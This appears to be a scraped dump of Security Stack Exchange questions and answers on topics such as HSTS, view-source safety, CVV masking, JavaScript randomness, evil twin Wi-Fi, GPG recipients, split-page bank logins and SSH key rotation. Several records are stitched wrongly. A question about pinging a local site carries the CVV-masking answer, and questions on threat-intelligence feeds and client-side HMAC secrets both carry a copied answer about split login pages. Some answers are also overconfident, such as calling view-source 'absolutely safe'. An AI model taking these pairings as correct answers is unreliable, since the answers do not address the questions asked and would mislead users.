responses conveyed over non-secure transport. | This client behavior is prohibited by section 8.1 of the RFC : If an HTTP response is received over insecure transport, the UA MUST ignore any present STS header field(s). The spec prohibits severs from sending insecure HSTS directives and clients from processing insecure HSTS directives. This ensures that a faulty implementation in either a server or client is not sufficient to undermine HSTS; the failure must be present in both for the weakness to be present. As noted in your question, HSTS over plain HTTP sounds like a great way for an attacker to implement long-term client-enforced denial of service on a service offered over HTTP. In fact, section 14.3 of RFC 6797 addresses this specifically (as well as an even more serious concern): The rationale behind this [ requirement that HSTS be served over secure connections only ] is that if there is a "man in the middle" (MITM) -- whether a legitimately deployed proxy or an illegitimate entity -- it could cause various mischief (see also Appendix A ("Design Decision Notes") item 3, as well as Section 14.6 ("Bootstrap MITM Vulnerability")); for example: Unauthorized notation of the host as a Known HSTS Host, potentially leading to a denial-of-service situation if the host does not uniformly offer its services over secure transport (see also Section 14.5 ("Denial of Service") ). Resetting the time to live for the host's designation as a Known HSTS Host by manipulating the max-age header field parameter value that is returned to the UA. If max-age is returned as zero, this will cause the host to cease being regarded as a Known HSTS Host by the UA, leading to either insecure connections to the host or possibly denial of service if the host delivers its services only over secure transport. Since HTTP can be easily spoofed, an attacker could specify an HSTS directive to treat an HTTP-only site as an HTTPS site: the client would then demand HTTPS and the server would be unable to supply it. More seriously, this section of the RFC indicates that an attacker who can issue HSTS directives for a host could strip the host's status as a Known HSTS Host, thereby dangerously allowing the client to issue plain HTTP requests to the host. | {
"source": [
"https://security.stackexchange.com/questions/84714",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
84,818 | Let's say there's a URL www.badjs.com which is untrusted and may contain bad scripts. Intuitively, a view-source navigation to that URL does not execute any scripts so it should be safe. It would at least allow me to inspect the source safely. But intuition is a terrible way to draw conclusions on security issues, so my question is: Is view-source a safe way to look at a website from a js script injection perspective? | Yes, it is absolutely safe (in Google Chrome) to open an untrusted website in view-source mode. The key point to note here is that you should "open" the page in view-source mode, meaning you should not allow any rendering to happen by normally loading the webpage first and then viewing the source. An example in Google Chrome would be view-source:http://www.badjs.com/ By design, Google Chrome will initiate a new GET request to the server and provide the client browser with the unrendered version of the webpage when in view-source mode. You could also use a No-Script extension or add-on for your specific browser to prevent any scripting attacks. | {
"source": [
"https://security.stackexchange.com/questions/84818",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68349/"
]
} |
84,894 | Most popular web services like PayPal, Google Wallet, and others do not mask CVV numbers, eg: ( <input type="password"> ). As I read, the CVV is a security feature and it seems logical to mask it in order to hide it from prying eyes. But I haven't see any web service that masks this input. | Most likely answer: They don't have to (it's not a PCI requirement) It's better from a UI/support standpoint Let's keep this in perspective. This is the number that's printed, on the back of the card, right where minimum-wage cashiers are instructed to visually inspect when performing a POS transaction. Absolute secrecy from physical bystanders is clearly not the intended control for the CSC ! Pay attention rather to the aggressive controls the PCI DSS imposes to ensure it's never stored by anyone in the processing chain. They are not concerned with onesie-twosies being shoulder-surfed, they're concerned with the people who steal credit card databases getting away with the CSC too. | {
"source": [
"https://security.stackexchange.com/questions/84894",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/57297/"
]
} |
84,897 | I am using ping command to test my website which is running on a local server at the moment. | Most likely answer: They don't have to (it's not a PCI requirement) It's better from a UI/support standpoint Let's keep this in perspective. This is the number that's printed, on the back of the card, right where minimum-wage cashiers are instructed to visually inspect when performing a POS transaction. Absolute secrecy from physical bystanders is clearly not the intended control for the CSC ! Pay attention rather to the aggressive controls the PCI DSS imposes to ensure it's never stored by anyone in the processing chain. They are not concerned with onesie-twosies being shoulder-surfed, they're concerned with the people who steal credit card databases getting away with the CSC too. | {
"source": [
"https://security.stackexchange.com/questions/84897",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71385/"
]
} |
84,906 | I was reading up on the documentation for Math.random() and I found the note: Math.random() does not provide cryptographically secure random
numbers. Do not use them for anything related to security. Use the Web
Crypto API instead, and more precisely the
window.crypto.getRandomValues() method. Is it possible to predict what numbers a call to random will generate? If so - how could this be done? | Indeed, Math.random() is not cryptographically secure. Definition of Math.random() The definition of Math.random() in the ES6 specification left a lot of freedom about the implementation of the function in JavaScript engines: Returns a Number value with positive sign, greater than or equal to 0 but less than 1, chosen randomly or pseudo randomly with approximately uniform distribution over that range, using an implementation-dependent algorithm or strategy. This function takes no arguments. Each Math.random function created for distinct code Realms must produce a distinct sequence of values from successive calls. So let's have a look at how the most popular JavaScript engines implemented it. SpiderMonkey, used by Firefox and many programs , implemented an algorithm named Xorshift128+ ( link to Mozilla's repository ). V8, used by Chrome and Node.js , also implemented the Xorshift128+ algorithm (called in the RandomNumberGenerator function ) Webkit, used by Safari , also implemented the Xorshift128+ algorithm . Chakra , the JavaScript engine powering Microsoft Edge, also implemented the Xorshift128+ algorithm . Xorshift128+ is one of the XorShift random number generators , which are among the fastest non-cryptographically-secure random number generators. I don't know if there's any attack on any of the implementations listed above, though. But those implementations are very recent, and other implementations (and vulnerabilities) existed in the past, and may still exist if your browser / server haven't been updated. Update: douggard's answer explains how someone can recover the state XorShift128+ and predict Math.random() values. V8's MWC1616 algorithm On November 2015, Mike Malone explained in a blog post that V8's implementation of the MWC1616 algorithm was somehow broken : you can see some linear patterns on this test or on this one if you're using a V8-based browser. The V8 team handled it and released a fix in Chromium 49 (on January 15th, 2016) and Chrome 49 (on March 8th, 2016). This paper pulished in 2009 explained how to determine the state of the PRNG of V8's based on the previous outputs of Math.random() (the MWC1616 version). Here's a Python script which implements it (even if the outputs are not consecutive). This has been exploited in a real world attack on CSGOJackbot , a betting site built with Node.js. The attacker was fair enough to just make fun of this vulnerability. Lack of compartmentalization Before ES6, the Math.random() definition didn't specify that distinct pages had to produce distinct sequences of values. This allowed an attacker to generate some random numbers, determine the state of the PNRG, redirect the user to a vulnerable application (which would use Math.random() for sensitive things) and predict which number Math.random() was going to return. This blog post presents some code about how to do it (Internet Explorer 8 and below). The ES6 specification (which had been approved as a standard on June 17, 2015) makes sure that browsers handle this case correctly. Badly-chosen seed Guessing the seed chosen for initializing the sequence can also allow an attacker to predict the numbers in the sequence. It's also a real world scenario, since it has been used on Facebook in 2012. This paper published in 2008 explains different methods to leak some information thanks to the browsers' lack of randomness. Solutions First of all, always make sure that your browsers / servers are updated regularly. Then, you should use cryptographic functions if needed: If you're working in a browser environment, then you can use crypto.getRandomValues , part of the Web Crypto API (check the support table ). If you're working with Node.js, then you can use crypto.randomBytes . Both rely on OS-level entropy, and will let you get cryptographically random values. | {
"source": [
"https://security.stackexchange.com/questions/84906",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5169/"
]
} |
84,970 | I just changed the password on a school-related web site. After completing the change successfully, the next page showed what the password was changed to. Can I conclude from this that the password is not being stored only as a hash? | No, you cannot conclude that. The password can be hashed on the server-side only, which implies that the password is sent in plain text to the server and stored in a variable. Then, nothing stops the Web application from displaying the sent password to the user, in the case where the very same script that has received the password is giving you the feedback about the password change. On the other hand, if a whole other module gives you the password in plain text (perhaps a password recovery function), then you could conclude that it is not hashed. Edit: To avoid any confusion, in this case "plain text" does not refer to SSL in any way, it simply suggests that the password is not sent pre-hashed to the server. | {
"source": [
"https://security.stackexchange.com/questions/84970",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67483/"
]
} |
85,031 | While I do not claim to be an expert in all things security based, I'd think that I have a good grounded knowledge of what is acceptable and what is not in regards to digital security. After giving some general advice on internal network security, I was advised by a company that physical access based attacks (i.e. attacker has access to internal network) are unrealistic and are considered out of scope. I was informed that due to the company having a guest wifi system which is in a DMZ, it's not a problem for them. The main oversight that they don't seem to understand or accept is that from outside the office, you can see in plain sight the private wifi password stuck to the walls around the office, as so many people constantly forget them. Without lighting fires, I am really struggling to get them to accept that this is horrible practice and they are really opening themselves up if an attacked or compromised system was connected to their private wifi. For example, customer brings device into office for a meeting, sees a publicly advertised wifi password in the meeting room and continues to connect to the wifi. Customers machine is compromised and now has full access to the private internal network containing business critical data, and a ton of personal data due to bad domain policies. Any suggestions on the best way to approach this situation? | Take a passive approach and do a risk assessment. Security management is a form of risk management. You have assets which might have threats and vulnerabilities. A threat exploiting a vulnerability is a risk, which is calculated by calculating (quantitative) or estimating (qualitative) the likelihood and impact (most of the time it's high,medium,low but some organizations have their own). First you expose the risk. You derive an impact of an attacker having access to the internal network. Then you assess the likelihood and technical complexity. In your case the hard part is getting buy in from your management. So the first thing to do is taking references. Have a look if you find specific requirements for the type of business you are in, the size of your business and what industry best practice guides say you should do (NIST). It's important to structure your risks like this ensuring you have both the technical reasons, but also a clear business impact (what is this going to cost the business?) (in the end the business is what it's all about, IT is just an enabler). As you are from the UK and you clearly think there is a risk for private data, have a look at the Data Protection Act . It's always interesting to show what can happen by refering to cases which bear a similarity to your current environment. Make sure that they understand that the upper management can be held personally accountable if it's deemed they made wrong decisions (e.g. not fixing this), but do not threaten them as this may have an adverse effect. There's also the EU General Data Protection Regulation , which will be finalized end of this year. It allows the EU to fine companies up to 5% of their global turnover in case severe missmanagement of personal data is found. After you have made the report, you need to present it to your management, which is someone responsible for the business and someone responsible for IT as well as your internal audit department. That's the easy part. Now comes the hard part: sell security . You will need to get buy-in from your upper management to fix this, which will most likely cost money as they will need to spend resources. Unfortunately it's quite hard to do so, you need to involve your stake holders in the security process and explain the benefits to them. It's important to involve all employees in your security process. The security executive cannot sell the necessity and importance of the security function to others if people do not understand it. Now the best way to get buy-in is to make them first understand. Make sure you think of a solution for each problem you face, you're already half way if you can come up with a good alternative. In your case it could be password managers or using domain credentials (PEAP authentication). I'm not a fan of allowing just any device into the internal network, preferably the only devices allowed should be those issued by the company. Note that the business may decide to sign off on the risk. This means that they're aware of the risk, but choose not to do anything with it. In the end there's only so much you can do. To be fair, it's not uncommon that a serious incident occurs before people start seeing the importance of security. It's sad, but the hard truth. | {
"source": [
"https://security.stackexchange.com/questions/85031",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71448/"
]
} |
85,074 | I am developing an application in PHP and it uses bcrypt encryption to store passwords. I want to keep the history of hashes whenever the user changes the password. By doing this I want to stop the user from entering the previous passwords in some scenarios. Is it safe to keep the history of hashes? According to my observation, if a user changes his password and keeps the same as a previous one, the hash values become different. How can I stop him from keeping the same password from the previous history? Is it possible while using bcrypt encryption? | Security of storing Hash History Is it safe to keep the history of hashes? Relatively. I can imagine some scenarios where this would harm the security of the user, eg: A user uses a relatively weak password, realizes this and updates the password to a better password, based on the previous password (simple example: superawesome -> !sup3eraw3s0m3! ), this would lead to an attacker being able to easier crack the now more secure password (they first crack the easy password, have it in their wordlist now, and then apply basic rules to it such as e -> 3, etc). They previously used a password on your website that they also use at a lot of other websites, stopped trusting your website, and thus changed the password at your website. An attacker could get your database, crack their old password (which they thought would be deleted from your database), and then try the login credentials at a different website. After a while, you have a lot of history on a user that changes passwords frequently. An attacker cracks lets say 30% of the history hashes, and now has a pretty good idea how that specific user creates passwords. If the user doesn't create passwords truly random, it will be a lot easier to break the current password. So I would not recommend keeping a password hash history. Alternative How can I stop him to keep the same password from the previous history? Don't keep a history. When a user changes their password, you still have the original password hash in the database. You can compare it to that to prevent exact duplicates. But using bcrypt, this happens: According to my observation, if a user changes his password and keeps the same as a previous one, the hash values become different It happens because bcrypt automatically manages salts for you. So when you hash a new password, it is hashed with a different salt, and thus the hash is different. You could retrieve the old salt , and then pass it onto password_hash as argument to get the same hash. Better Alternative You could also require the user to submit their old password when changing passwords (which also increases security[*]), and then you can even check if the new password is similar to the old password (eg using hamming distance or similar). Both of my alternatives do not prevent cyclic changes though (eg super-secure-password -> another-awesome-credential -> super-secure-password ), but I'm not sure if I would really be worried about that. [*] someone highjacking a session can't change the password, and the password can't be changed by CSRF (even if there is an XSS vulnerability). | {
"source": [
"https://security.stackexchange.com/questions/85074",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71332/"
]
} |
85,138 | Let's say you are traveling, and you pause in the airport lounge, or your hotel lobby, or a nearby coffee shop. You haul out your laptop and scan the available wireless networks. You know the name of the wireless network because it is written behind the counter/on a slip of paper/well known. You see that there are two options: "Free Public Wifi" & "Free Public Wifi" Which one is the actual wireless network, and which one is the Evil Twin attack? How can you tell? What tools or techniques would you use to decide? (I'm less interested in answers that involve not connecting to either, or avoiding public wireless, and more interested in the techniques to discriminate legitimate vs non-legitimate APs from a users and not administrators perspective. I'm using " Evil Twin " in this specific sense rather than a general "malicious actor" sense.) | Traditionally there hasnt been an easy user-oriented method to detect evil twin attacks. Most attempts to detect an evil twin attack (ETA) are geared towards the administrator of a network where they basically have the authorised network admins scanning and comparing wireless traffic. This isnt so much of what you are interested in. There is a paper here (and slides ) that goes over an experimental approach to determine from the user's perspective a real-time ETA. Basically, they use a cunning approach to statistically determine which access point is authorised and which is the evil twin. A simple approach (that will not always work) that I propose is to merely sniff yourself and see what the IP addresses are. The idea being that an unathorised AP will have a nonstandard (IE what you would expect) IP and thus throw up some red flags... Here is a link that describes how to setup your own ETA so you can play around with my method (or try your own). WARNING: If you are creating an ETA, do so in a lab environment as this is illegal in public. Also note that an ETA can be greatly mitigated by simply securing the network via an authentication system that uses Extensible Authentication Protocols such as WPA2-enterprise -which works by validating both the client and access point. To address some other points... If you have a way to communicate with the authorised network administrators (or at least know which access point is the proper one), then you have already completed a psuedo-meta-athorisation method outside of the digital realm (IE I can physically see the proper router and know it's mac address, ip settings, etc and can thus compare them with what my adapter is telling me I'm connected to). Most often, we do not have this info and moreover shouldnt trust it even if we did. Thus, perhaps the 'best' method for using an untrusted network (ET or not) is to always assume it is compromised and implement a VPN or simply abstain altogether! | {
"source": [
"https://security.stackexchange.com/questions/85138",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70682/"
]
} |
85,157 | When I send, say, a great recipe for funnel cake to Alice and Bob using GPG, I can be pretty sure they will both be able to decrypt it. However, can I be certain, or prove after the fact, that they will be the only ones who can?* Context : I assumed this was easy: gpg messages have a list of possible decryption key IDs, which I thought was always guaranteed to be complete. However, then I stumbled upon the --try-all-secrets option for gpg itself and now I'm not sure anymore. If I understand the options correctly, I can have a key that is able to decrypt the message, but is not on the 'public' list of recipients. The 'public' list might have an all-zeroes key ID to show there's something going on but it appears it doesn't always need to. So, that got me thinking... Question : Would I be able to tell (based on the encrypted output only) if someone had modified my version of gpg to secretly add Eve as an anonymous recipient? Would I need to be one of the recipients to be able to tell? I know that this scenario would probably never occur in practice, and if an attacker was able to replace your gpg binary this scenario would probably be the least of your worries, but I'm still curious. *: Assuming of course their private keys are kept private, nobody bribes Alice to share the winning recipe, and so on. | You can't necessarily tell who can decrypt a given GPG file by looking at it, but assuming nobody has any knowledge aside from their own private keys and the encrypted file itself, it is possible tell how many people can. When you encrypt a message, GPG generates a random symmetric key, called a "session key", and uses it to encrypt the message. It then makes a bunch of copies of the session key, and encrypts each one under a different public key, one for each recipient. It then packages all of these encrypted "key packets" along with the encrypted message using the OpenPGP container format . The important thing is that if all you have is the encrypted file, you have to be able to decrypt at least one of these encrypted session key packets in order to get to the message. You can list all of the packets in an encrypted file using the gpg --list-packets command: $ gpg --batch --list-packets myfile.gpg
:pubkey enc packet: version 3, algo 16, keyid 0000000000000000
data: [2048 bits]
data: [2046 bits]
gpg: anonymous recipient; trying secret key ABCDE123 ...
:pubkey enc packet: version 3, algo 16, keyid 123ABCDE0987654F
data: [2048 bits]
data: [2046 bits]
:encrypted data packet:
... (The --batch flag prevents GPG from asking me for my passphrase, so that it can't decrypt anything. If you're running a GPG agent, it'll take more than that.) Those "pubkey encrypted packets" are encrypted session key packets that were read from the file. The one with "keyid 123ABCDE0987654F" is a normal recipient; the key ID is a hint to tell you which key can be used to decrypt the packet. The one with "keyid 0000000000000000" is an anonymous recipient: you don't know which key will decrypt it, but you know it's there waiting to be decrypted by something . If your gpg was modified to add Eve as an anonymous recipient, this is what you would see when inspecting the .gpg file using a clean gpg binary. It's also what you would see if you added an anonymous recipient on purpose. If Eve's a little more clever, though, then there are a couple of ways to further hide recipients: The listed keyid value could be a lie. The all-zeroes keyid is just a convention, and the normal keyid is just a hint: there could be anything there. Eve could label her encrypted key packet using Bob's keyid, and replace Bob's legitimate packet with hers. It would look like a packet for Bob, but if he tried to use it, the decryption would fail. Only Bob would be able to check this. The --try-all-secrets flag is somewhat related, and could be useful if the keyid was accidentally wrong. Eve doesn't have to put her key packet into the file, or even create an encrypted key packet for herself at all. Try out the --show-session-key and --override-session-key flags on a dummy file with no sensitive data. These will let you handle the session key directly instead of keeping it hidden away in encrypted key packets. If Eve has replaced your gpg binary, she could (for example) have it email her the session key of every file you encrypt, along with a hash of the encrypted data for easy identification. This violates the "no prior knowledge" assumption from earlier, but I felt the existence of these flags made it worth mentioning. | {
"source": [
"https://security.stackexchange.com/questions/85157",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71654/"
]
} |
85,160 | An online bank I use requires inputting your username, navigating to a second page and then entering the password to login. What actual security advantage does this provide, if any? | From a security control perspective , all it really does is slow down the ability of automated password probing software to perform their task of trying out multiple passwords. The site is hoping an attacker may choose a "softer" target instead of their site. As an actual security control, this technique is not particularly effective. Also, specifically for banks, this is one of several Industry
approved "security enhancements" that the U.S. banking industry is requiring
member banks to choose from. In the U.S. in 2011, all banks and
credit unions were informed of new cybersecurity policy from the
Federal Financial Institutions Examination Council
( https://www.ffiec.gov/pdf/Auth-ITS-Final%206-22-11%20%28FFIEC%20Formated%29.pdf ),
along with authentication guidance presentations
( https://chapters.theiia.org/western-new-york/ChapterDocuments/FFIEC%20Authentication%20Guidance.pptx ).
I remember the bank I use converting their login pages in 2012 and 2013
to meet the new standards before their annual audit, including moving the password to a separate page from the userid. Given all the
stolen password lists, the separate stolen email address lists, the
fact that most users use the same password on all the sites they have
accounts at, and the fact that most sites stupidly (from a security
perspective) force user-ids to be email addresses, there are new
types of highly selective "low-and-slow" over-the-web password
probing systems that take advantage of all the above. So the site is hoping that making the login sequence slower to do the automated password probing may make the attackers give up sooner. From a security UI design perspective , this UI design pattern does offer some useful advantages. It allows sites that adopt it to add conditional authentication steps. For example, a site can offer their users the option for a text-message token to create a two-factor authentication. For those users that provided a mobile number, the sequence may be: page1=enter userid, page2=enter token, page3=enter password. For those users that did not provide a mobile number, it is just page1=enter userid, page2=enter password. This UI design template also allows for gradual conversion of their user base to newer and stronger authentication both over-a-timespan and user-by-user , which are both critical considerations for a site with thousands or more of users. Another example, the bank I use in 2012 converted their login pages to first ask me for user id, then asks me to confirm an image I picked in my profile from a set of images, then finally asks for my password, all on separate pages. Whether or not picking an image from a set of images really adds any authentication effectiveness is a separate issue from the question about the login UI design template. A further example, some banks chose to implement a "UI Keyboard" to attempt to thwart key loggers (userid is entered on one page with a regular UI text field, then a second page is brought up with the "UI Keyboard". One can debate whether an on-screen keyboard is or is not effectivesecurity-wise, but the UI design pattern of configurable and sequential authentication on separate pages allows sites this freedom to innovate. Most sites do not prematurely end the login sequence if something is incorrectly entered. The end-user enters all information in the various pages of the sequence, and only at the end learns if authentication was successful or not. Some sites do exit early, which creates some institutional residual risk in terms of account validity detection. Which specific authentication steps are shown can even vary by the particular user-id given what that user selected in their profile. So sites that do this are not forced anymore to offer only one fixed authentication sequence for all their end-users. Even more advanced login systems of this style can even vary the authentication steps for the same end-user who fails a first authentication, or is accessing from an unknown computer/device, or from an IP address that is significantly out-of-area, or if the site's automated IDS software thinks a password probing attack is in-progress. So separating IDENTIFICATION from AUTHENTICATION (aka user-id from password and other steps) in the login UI gives sites more freedom and flexibility to evolve their login processes over time. Those sites that change their login pages to this new template can further adapt or alter the login sequence in the future, yet have their end-users not feel like the login process is changing all that much. | {
"source": [
"https://security.stackexchange.com/questions/85160",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71661/"
]
} |
85,162 | Do state of the art commercial URL threat intelligence feeds ( for example, one's by Symantec, Intel-security etc) miss malicious domains? (i.e. domains serving malware,exploit code & phishing domains - to make the discussion specific.) If so, why? What are the technical challenges people are facing in solving this problem?
I understand that there are many methods people use to do detection including a combination of machine learning, capturing data with honeypots,etc behind the scenes to generate such feeds.
I want to specifically understand what technical obstacles limit the effectiveness of these methods and why they miss what they miss. | From a security control perspective , all it really does is slow down the ability of automated password probing software to perform their task of trying out multiple passwords. The site is hoping an attacker may choose a "softer" target instead of their site. As an actual security control, this technique is not particularly effective. Also, specifically for banks, this is one of several Industry
approved "security enhancements" that the U.S. banking industry is requiring
member banks to choose from. In the U.S. in 2011, all banks and
credit unions were informed of new cybersecurity policy from the
Federal Financial Institutions Examination Council
( https://www.ffiec.gov/pdf/Auth-ITS-Final%206-22-11%20%28FFIEC%20Formated%29.pdf ),
along with authentication guidance presentations
( https://chapters.theiia.org/western-new-york/ChapterDocuments/FFIEC%20Authentication%20Guidance.pptx ).
I remember the bank I use converting their login pages in 2012 and 2013
to meet the new standards before their annual audit, including moving the password to a separate page from the userid. Given all the
stolen password lists, the separate stolen email address lists, the
fact that most users use the same password on all the sites they have
accounts at, and the fact that most sites stupidly (from a security
perspective) force user-ids to be email addresses, there are new
types of highly selective "low-and-slow" over-the-web password
probing systems that take advantage of all the above. So the site is hoping that making the login sequence slower to do the automated password probing may make the attackers give up sooner. From a security UI design perspective , this UI design pattern does offer some useful advantages. It allows sites that adopt it to add conditional authentication steps. For example, a site can offer their users the option for a text-message token to create a two-factor authentication. For those users that provided a mobile number, the sequence may be: page1=enter userid, page2=enter token, page3=enter password. For those users that did not provide a mobile number, it is just page1=enter userid, page2=enter password. This UI design template also allows for gradual conversion of their user base to newer and stronger authentication both over-a-timespan and user-by-user , which are both critical considerations for a site with thousands or more of users. Another example, the bank I use in 2012 converted their login pages to first ask me for user id, then asks me to confirm an image I picked in my profile from a set of images, then finally asks for my password, all on separate pages. Whether or not picking an image from a set of images really adds any authentication effectiveness is a separate issue from the question about the login UI design template. A further example, some banks chose to implement a "UI Keyboard" to attempt to thwart key loggers (userid is entered on one page with a regular UI text field, then a second page is brought up with the "UI Keyboard". One can debate whether an on-screen keyboard is or is not effectivesecurity-wise, but the UI design pattern of configurable and sequential authentication on separate pages allows sites this freedom to innovate. Most sites do not prematurely end the login sequence if something is incorrectly entered. The end-user enters all information in the various pages of the sequence, and only at the end learns if authentication was successful or not. Some sites do exit early, which creates some institutional residual risk in terms of account validity detection. Which specific authentication steps are shown can even vary by the particular user-id given what that user selected in their profile. So sites that do this are not forced anymore to offer only one fixed authentication sequence for all their end-users. Even more advanced login systems of this style can even vary the authentication steps for the same end-user who fails a first authentication, or is accessing from an unknown computer/device, or from an IP address that is significantly out-of-area, or if the site's automated IDS software thinks a password probing attack is in-progress. So separating IDENTIFICATION from AUTHENTICATION (aka user-id from password and other steps) in the login UI gives sites more freedom and flexibility to evolve their login processes over time. Those sites that change their login pages to this new template can further adapt or alter the login sequence in the future, yet have their end-users not feel like the login process is changing all that much. | {
"source": [
"https://security.stackexchange.com/questions/85162",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10160/"
]
} |
85,165 | I went through the question Securing a JavaScript Single Page App with RESTful backend that has discussions / options around securing a Javascript client side app that invokes RESTful APIs. However, from the discussions, it is not clear as to how the "shared secret" that is used for computing the HMAC is kept safe at the client side. Storing such a Shared secret in either a Cookie (which is accessible from scripts) or even in local storage is no-good as these are vulnerable to leaks. Are the keys generated dynamically so that every round trip to the server returns a new key that is to be used for computing the HMAC for the next round trip ? | From a security control perspective , all it really does is slow down the ability of automated password probing software to perform their task of trying out multiple passwords. The site is hoping an attacker may choose a "softer" target instead of their site. As an actual security control, this technique is not particularly effective. Also, specifically for banks, this is one of several Industry
approved "security enhancements" that the U.S. banking industry is requiring
member banks to choose from. In the U.S. in 2011, all banks and
credit unions were informed of new cybersecurity policy from the
Federal Financial Institutions Examination Council
( https://www.ffiec.gov/pdf/Auth-ITS-Final%206-22-11%20%28FFIEC%20Formated%29.pdf ),
along with authentication guidance presentations
( https://chapters.theiia.org/western-new-york/ChapterDocuments/FFIEC%20Authentication%20Guidance.pptx ).
I remember the bank I use converting their login pages in 2012 and 2013
to meet the new standards before their annual audit, including moving the password to a separate page from the userid. Given all the
stolen password lists, the separate stolen email address lists, the
fact that most users use the same password on all the sites they have
accounts at, and the fact that most sites stupidly (from a security
perspective) force user-ids to be email addresses, there are new
types of highly selective "low-and-slow" over-the-web password
probing systems that take advantage of all the above. So the site is hoping that making the login sequence slower to do the automated password probing may make the attackers give up sooner. From a security UI design perspective , this UI design pattern does offer some useful advantages. It allows sites that adopt it to add conditional authentication steps. For example, a site can offer their users the option for a text-message token to create a two-factor authentication. For those users that provided a mobile number, the sequence may be: page1=enter userid, page2=enter token, page3=enter password. For those users that did not provide a mobile number, it is just page1=enter userid, page2=enter password. This UI design template also allows for gradual conversion of their user base to newer and stronger authentication both over-a-timespan and user-by-user , which are both critical considerations for a site with thousands or more of users. Another example, the bank I use in 2012 converted their login pages to first ask me for user id, then asks me to confirm an image I picked in my profile from a set of images, then finally asks for my password, all on separate pages. Whether or not picking an image from a set of images really adds any authentication effectiveness is a separate issue from the question about the login UI design template. A further example, some banks chose to implement a "UI Keyboard" to attempt to thwart key loggers (userid is entered on one page with a regular UI text field, then a second page is brought up with the "UI Keyboard". One can debate whether an on-screen keyboard is or is not effectivesecurity-wise, but the UI design pattern of configurable and sequential authentication on separate pages allows sites this freedom to innovate. Most sites do not prematurely end the login sequence if something is incorrectly entered. The end-user enters all information in the various pages of the sequence, and only at the end learns if authentication was successful or not. Some sites do exit early, which creates some institutional residual risk in terms of account validity detection. Which specific authentication steps are shown can even vary by the particular user-id given what that user selected in their profile. So sites that do this are not forced anymore to offer only one fixed authentication sequence for all their end-users. Even more advanced login systems of this style can even vary the authentication steps for the same end-user who fails a first authentication, or is accessing from an unknown computer/device, or from an IP address that is significantly out-of-area, or if the site's automated IDS software thinks a password probing attack is in-progress. So separating IDENTIFICATION from AUTHENTICATION (aka user-id from password and other steps) in the login UI gives sites more freedom and flexibility to evolve their login processes over time. Those sites that change their login pages to this new template can further adapt or alter the login sequence in the future, yet have their end-users not feel like the login process is changing all that much. | {
"source": [
"https://security.stackexchange.com/questions/85165",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32783/"
]
} |
85,253 | So I mistook input fields and now my SSH key passphrase is visible to the world, and I can't even remove it. Now as far as I understand, this is not an immediate security concern, since the passphrase only protects against the case of my private key itself getting disclosed. Since that hasn't happened (they key only exists on hardware I own), I at most have to change the passphrase in case it happens in the future, I don't have to change to a different SSH key everywhere I've used it. Is that correct? Keeping in mind that all of this is for private projects and a hypothetical breach could at most be annoying and embarassing. | Technically , changing your passphrase is sufficient if you don't also believe that your (password-protected) private key has also been leaked. Realistically , you might just want to replace your SSH key with a new one. They're so cheap they might as well be free, and it removes you from worrying about whether anyone has, is, or will be able to get a copy of the private key with the compromised passphrase. Remember, if somebody grabs a copy of your key that you backed up months before you leaked (and changed) your passphrase, the passphrase still gives them access to that key - which is the same as you're using today under a new passphrase. So just change your key. It's good practice and best practices. Edit: @David-Z has suggested that the time involved in replacing the key is a cost to be considered. I maintain that, since we're talking about keys, that's also negligible, as you can automate the process. The following script took me about 15 minutes to write and test: #!/bin/bash
for i in $*
do
cat newkey.pub | ssh -i oldkey username@$i "cat >> ~/.ssh/authorized_keys"
ssh -i newkey username@$i "sed -n '/my_old_key/!p' < ~/.ssh/authorized_keys > ~/.ssh/authorized_keys_tmp && mv ~/.ssh/authorized_keys_tmp ~/.ssh/authorized_keys"
if [ $? -eq 0 ]; then
echo "Successful key replacement for $i"
else
echo "Key replacement failed for $i"
fi
done This script will: Use the old key to append the new key to the remote authorized_keys Use the new key to remove the old key from the remote authorized_keys The beauty is that if anything went wrong pushing the new key out, the removal of the old key will fail since it uses the new key, so you're less likely to shoot yourself in the foot. You'll need to cache your passphrases with ssh-agent so that it doesn't prompt you for these uses of ssh; then just run it with the servers you want to update on the command line: $ ssh-agent
SSH_AUTH_SOCK=/tmp/ssh-GWE6uxZxn9IS/agent.2016; export SSH_AUTH_SOCK;
SSH_AGENT_PID=2017; export SSH_AGENT_PID;
echo Agent pid 2017;
$ ssh-add oldkey
Enter passphrase for oldkey:
Identity added: oldkey (oldkey)
$ ssh-add newkey
Enter passphrase for newkey:
Identity added: newkey (newkey)
$ ./chssh.sh server1 server2 server3
Successful key replacement for server1
Successful key replacement for server2
Successful key replacement for server3
$ | {
"source": [
"https://security.stackexchange.com/questions/85253",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10837/"
]
} |
85,264 | Lately, whenever I click on a download link in Google Chrome, it redirects to another link starting with s3.amazonaws.com , which in turn gets blocked either by Chrome or by my Antivirus (Comodo Internet Security). Copying the same link into Firefox or (*) a download manager downloads the file normally. I have tried resetting Chrome settings, disconnecting my Google account, removing all extensions, disabling all plugins, and performing a system scan, but the issue persists. My question is: What exactly is s3.amazonaws.com ? Is it malicious, or is Chrome mistrusting it? And how do I fix the issue? Edit: An example file that invokes such behavior is Pandoc msi setup from this page (*) It no longer works with Firefox | s3.amazonaws.com is an endpoint for a cloud file storage product offered by Amazon Web Services (AWS) and is used by many websites and apps (albeit usually behind the scenes, but you can serve files from it directly too). Seeing references to that domain is definitely not inherently malicious, however given that you can store just about any file in S3 there's no guarantee that it isn't being used to store some malicious files (among the overwhelmingly legitimate files). AWS credentials are a valuable target for hackers so it's possible the owner of the account has been compromised. Chrome and Comodo may know that attributes such as the size, checksum, name, etc. of the file match that of known malware which is why they're blocking it (rather than necessarily because it's served from s3.amazonaws.com ). I'd recommend reporting it via the AWS abuse form or by emailing [email protected] . If it is malware then they'll most likely remove it and contact the account owner. AWS is usually extremely proactive about security issues. | {
"source": [
"https://security.stackexchange.com/questions/85264",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/51694/"
]
} |
